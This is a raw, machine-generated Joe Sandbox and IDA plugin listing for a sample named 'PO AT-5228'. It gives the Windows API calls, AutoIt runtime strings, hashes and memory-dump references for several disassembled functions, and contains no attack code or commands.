                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: bd329ffc4b46c6da5243eb130c4a5d4c8bf5779729f885f95cf8c01855f80a8a
                                                                                        • Instruction ID: fe008cb71f5f0f8ddb85774febb2b687fcf2cf7b25184b30368411a9558c10a2
                                                                                        • Opcode Fuzzy Hash: bd329ffc4b46c6da5243eb130c4a5d4c8bf5779729f885f95cf8c01855f80a8a
                                                                                        • Instruction Fuzzy Hash: F231B035A48209EADF14FB51CD93EEDB3E49F22740F2001F9F542B10E2EB55AE54E651
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 00B9EAB0
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B9EAC2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B9EAD9
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00B9EAEE
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00B9EAF4
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B9EB04
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00B9EB0A
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B9EB2B
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B9EB45
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B9EB4E
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B9EBB9
                                                                                        • GetDesktopWindow.USER32 ref: 00B9EBBF
                                                                                        • GetWindowRect.USER32(00000000), ref: 00B9EBC6
                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B9EC12
                                                                                        • GetClientRect.USER32(?,?), ref: 00B9EC1F
                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B9EC44
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B9EC6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                        • String ID:
                                                                                        • API String ID: 3869813825-0
                                                                                        • Opcode ID: 029e6a4c08982c73488a3dacc6199b055703c2889cc5a6d995fed99e3dba8cf4
                                                                                        • Instruction ID: 7925249f5720030db85784c86ac6e3db15c36a05a829d5a7241ded87772a224a
                                                                                        • Opcode Fuzzy Hash: 029e6a4c08982c73488a3dacc6199b055703c2889cc5a6d995fed99e3dba8cf4
                                                                                        • Instruction Fuzzy Hash: 87513C71900709AFDB20DFA8CD89B6EBBF5FF04705F004968E696A65A0DBB5E944CB10
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00BB79C6
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BB79D1
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00BB79DC
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00BB79E7
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00BB79F2
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00BB79FD
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00BB7A08
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00BB7A13
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00BB7A1E
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00BB7A29
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00BB7A34
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00BB7A3F
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00BB7A4A
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00BB7A55
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00BB7A60
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00BB7A6B
                                                                                        • GetCursorInfo.USER32(?), ref: 00BB7A7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: 72e027c174fbd7719581d2b44fda156bf9ba1969c6ceda7b87023103e5e909c1
                                                                                        • Instruction ID: 735b667eb88e0705b5976afe64bdd04147d811cee8317130ab6873c71c34ce39
                                                                                        • Opcode Fuzzy Hash: 72e027c174fbd7719581d2b44fda156bf9ba1969c6ceda7b87023103e5e909c1
                                                                                        • Instruction Fuzzy Hash: 0331E9B1D483196BDB509FB68C899AFBFE8FF44750F504526E50DE7280DAB8A5008F91
                                                                                        APIs
                                                                                          • Part of subcall function 00B7E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B6C8B7,?,00002000,?,?,00000000,?,00B6419E,?,?,?,00BFDC00), ref: 00B7E984
                                                                                          • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                                                        • __wsplitpath.LIBCMT ref: 00B6C93E
                                                                                          • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                                                        • _wcscpy.LIBCMT ref: 00B6C953
                                                                                        • _wcscat.LIBCMT ref: 00B6C968
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B6C978
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B6CABE
                                                                                          • Part of subcall function 00B6B337: _wcscpy.LIBCMT ref: 00B6B36F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 2258743419-1018226102
                                                                                        • Opcode ID: 4164c34010ab798dea44073412046a0dac7202d2501a29dc30e485e994b5ced7
                                                                                        • Instruction ID: 714d134dabbe63690bff2e3b373a15f05b30ad8f881c4eb37adde62693dc499d
                                                                                        • Opcode Fuzzy Hash: 4164c34010ab798dea44073412046a0dac7202d2501a29dc30e485e994b5ced7
                                                                                        • Instruction Fuzzy Hash: 7A129D315083419FC724EF24C881AAFBBE5EF99714F0449AEF58993262DB34DA49CB53
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BCCEFB
                                                                                        • DestroyWindow.USER32(?,?), ref: 00BCCF73
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BCCFF4
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BCD016
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BCD025
                                                                                        • DestroyWindow.USER32(?), ref: 00BCD042
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B60000,00000000), ref: 00BCD075
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BCD094
                                                                                        • GetDesktopWindow.USER32 ref: 00BCD0A9
                                                                                        • GetWindowRect.USER32(00000000), ref: 00BCD0B0
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BCD0C2
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BCD0DA
                                                                                          • Part of subcall function 00B7B526: GetWindowLongW.USER32(?,000000EB), ref: 00B7B537
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 3877571568-3619404913
                                                                                        • Opcode ID: 9c3ad099b60427465e5dc0abe2dc00283703fe57fc084215192c2a92296126f8
                                                                                        • Instruction ID: 486e608e59be6e55ace5c577dc074c883712fe1d7468e0e8bfe788df7ef98867
                                                                                        • Opcode Fuzzy Hash: 9c3ad099b60427465e5dc0abe2dc00283703fe57fc084215192c2a92296126f8
                                                                                        • Instruction Fuzzy Hash: C971D0B4150345AFD720CF28CC95FAA77E5EB88704F08456EF9858B2A1DB74E946CB12
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00BCF37A
                                                                                          • Part of subcall function 00BCD7DE: ClientToScreen.USER32(?,?), ref: 00BCD807
                                                                                          • Part of subcall function 00BCD7DE: GetWindowRect.USER32(?,?), ref: 00BCD87D
                                                                                          • Part of subcall function 00BCD7DE: PtInRect.USER32(?,?,00BCED5A), ref: 00BCD88D
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00BCF3E3
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BCF3EE
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BCF411
                                                                                        • _wcscat.LIBCMT ref: 00BCF441
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BCF458
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00BCF471
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00BCF488
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00BCF4AA
                                                                                        • DragFinish.SHELL32(?), ref: 00BCF4B1
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BCF59C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                        • API String ID: 169749273-3440237614
                                                                                        • Opcode ID: 2b81ed6905397b49f2539df2489b048af9b03bc33b4f170c3855a82c877b7264
                                                                                        • Instruction ID: f854e509415feb9d253258e2d959ce3d2334721f3854a737067d1c37006acf57
                                                                                        • Opcode Fuzzy Hash: 2b81ed6905397b49f2539df2489b048af9b03bc33b4f170c3855a82c877b7264
                                                                                        • Instruction Fuzzy Hash: CD616971108301AFC715EF64CC85EAFBBF8EF99710F000A6EF695961A1DB709A09CB52
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00BAAB3D
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00BAAB46
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BAAB52
                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00BAAC40
                                                                                        • __swprintf.LIBCMT ref: 00BAAC70
                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00BAAC9C
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BAAD4D
                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00BAADDF
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BAAE35
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BAAE44
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00BAAE80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                        • API String ID: 3730832054-3931177956
                                                                                        • Opcode ID: ec9755682fe6ee9c732535d45e5c42ba75c84610d63235012568c6a8bdf9dc8d
                                                                                        • Instruction ID: 49364190dda1605ebf651e72ce18b8ea93b5b0f36c6cfabf9ab62d4e23c94008
                                                                                        • Opcode Fuzzy Hash: ec9755682fe6ee9c732535d45e5c42ba75c84610d63235012568c6a8bdf9dc8d
                                                                                        • Instruction Fuzzy Hash: A5D1BD71A08205EBDB209F65C885B7AB7F5FF06B00F2484E5E455AB280DB74AD40DBB2
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BC71FC
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BC7247
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 62055ffb277534ca094ac7716a47cab63dcbdfd67d3041178514dfe6a6db00da
                                                                                        • Instruction ID: 96ad6191515df25d9e58aa55c300c1f96bb9bbb6c3b1d384692733612765088c
                                                                                        • Opcode Fuzzy Hash: 62055ffb277534ca094ac7716a47cab63dcbdfd67d3041178514dfe6a6db00da
                                                                                        • Instruction Fuzzy Hash: 93915E742446019BCF05EF24C491A6EB7E5EF95310F0488ECF89A5B392DB34ED46DB85
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BCE5AB
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00BC9808,?), ref: 00BCE607
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE647
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE68C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE6C3
                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00BC9808,?), ref: 00BCE6CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BCE6DF
                                                                                        • DestroyIcon.USER32(?), ref: 00BCE6EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BCE70B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BCE717
                                                                                          • Part of subcall function 00B80FA7: __wcsicmp_l.LIBCMT ref: 00B81030
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: efe3bd18e1e5fea1389c9393180b4aacb0a0c255302c4b0ddd3ff6af0c292059
                                                                                        • Instruction ID: b38ca756e2582e34ad04099acaf3bbe91e86203fca0b66cbd644a1fc9c899f36
                                                                                        • Opcode Fuzzy Hash: efe3bd18e1e5fea1389c9393180b4aacb0a0c255302c4b0ddd3ff6af0c292059
                                                                                        • Instruction Fuzzy Hash: 3661AF71610215FAEB14AF64CC86FAA7BE8FB18754F104259F925DB1D0EBB4D980CB60
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00BAD292
                                                                                        • GetDriveTypeW.KERNEL32 ref: 00BAD2DF
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD327
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD35E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD38C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1148790751-4113822522
                                                                                        • Opcode ID: b4d5a92cab0dcca28c7e962692dae3c47705a2978474f2c2e9f54dfa25cf4305
                                                                                        • Instruction ID: bc36bb916fc4986f46694947e106c5e0584dc3e3b2881ce05c013283d6cbd533
                                                                                        • Opcode Fuzzy Hash: b4d5a92cab0dcca28c7e962692dae3c47705a2978474f2c2e9f54dfa25cf4305
                                                                                        • Instruction Fuzzy Hash: 5C512B711043459FC700EF24C88196EB7F8EF99758F0089ADF89AA7261DB35EE06DB52
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00BD3973,00000016,0000138C,00000016,?,00000016,00BFDDB4,00000000,?), ref: 00BA26F1
                                                                                        • LoadStringW.USER32(00000000,?,00BD3973,00000016), ref: 00BA26FA
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00BD3973,00000016,0000138C,00000016,?,00000016,00BFDDB4,00000000,?,00000016), ref: 00BA271C
                                                                                        • LoadStringW.USER32(00000000,?,00BD3973,00000016), ref: 00BA271F
                                                                                        • __swprintf.LIBCMT ref: 00BA276F
                                                                                        • __swprintf.LIBCMT ref: 00BA2780
                                                                                        • _wprintf.LIBCMT ref: 00BA2829
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BA2840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 618562835-2268648507
                                                                                        • Opcode ID: 9bb7e9110acf2a9ab8ccf912c2cce33474497e151b67151937b1f11eefa31768
                                                                                        • Instruction ID: e8000ea02d24014918ac9734ae7feb22067e349af1d6f255a9b831530d571f64
                                                                                        • Opcode Fuzzy Hash: 9bb7e9110acf2a9ab8ccf912c2cce33474497e151b67151937b1f11eefa31768
                                                                                        • Instruction Fuzzy Hash: CB415E72800209BACF14FBE4DD86EEEB7B8AF16340F1000A5B50577092EE796F59DB61
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BAD0D8
                                                                                        • __swprintf.LIBCMT ref: 00BAD0FA
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BAD137
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BAD15C
                                                                                        • _memset.LIBCMT ref: 00BAD17B
                                                                                        • _wcsncpy.LIBCMT ref: 00BAD1B7
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BAD1EC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAD1F7
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00BAD200
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAD20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: 359f0c370a513858ec6d43e5273f766cb4b368987c088c754516617ee4e22ea0
                                                                                        • Instruction ID: 28f9f05359cf0d94777aace6c29f7dd72446437ae0b8921aaadc2883702e1c9c
                                                                                        • Opcode Fuzzy Hash: 359f0c370a513858ec6d43e5273f766cb4b368987c088c754516617ee4e22ea0
                                                                                        • Instruction Fuzzy Hash: A5316FB250424AABDB21DFA4DC89FAB77FCEF89740F1041B6F50AD6160EA709645CB24
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
